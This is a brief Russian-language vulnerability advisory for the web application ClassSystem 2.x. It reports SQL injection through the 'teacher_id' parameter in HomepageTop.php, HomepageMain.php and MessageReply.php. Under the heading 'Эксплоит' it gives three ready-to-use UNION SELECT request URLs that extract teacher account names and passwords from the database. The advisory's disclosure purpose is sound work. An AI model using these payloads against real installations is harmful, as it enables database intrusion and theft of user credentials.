Программа: ClassSystem 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "teacher_id" сценариями HomepageTop.php,
HomepageMain.php и MessageReply.php. Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

Эксплоит:

http://localhost/class/HomepageTop.php?teacher_id=-99’+union+
select+0,1,teacher_password,teacher_account,4,5+from+teacher/*

http://localhost/class/HomepageMain.php?teacher_id=-99’+union+
select+0,teacher_account,2,3,4,5,6,7,teacher_password+from+teacher/*

http://localhost/class/MessageReply.php?teacher_id=1&message_id=-
99’+union+select+teacher_account,teacher_password,3,4+from+teacher/*



Оставить мнение